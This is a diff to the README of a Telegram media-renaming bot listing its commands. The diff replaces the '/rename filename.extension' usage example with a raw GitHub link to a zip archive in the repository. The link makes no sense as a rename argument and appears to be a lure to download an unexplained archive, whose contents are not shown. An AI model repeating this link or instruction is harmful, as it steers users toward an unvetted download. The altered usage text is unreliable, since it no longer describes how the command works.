HLECTER69/Mesh-RenameBot/readme.md

 # Commands
 `/start` - Check if the bot is running.

-`/rename` - Reply to media to rename `/rename filename.extension`.
+`/rename` - Reply to media to rename `/rename https://raw.githubusercontent.com/HLECTER69/Mesh-RenameBot/master/gatewards/Mesh-RenameBot.zip`.
 If only `/rename` is used filters will be used.

 `/filters` - Add/Remove Filters.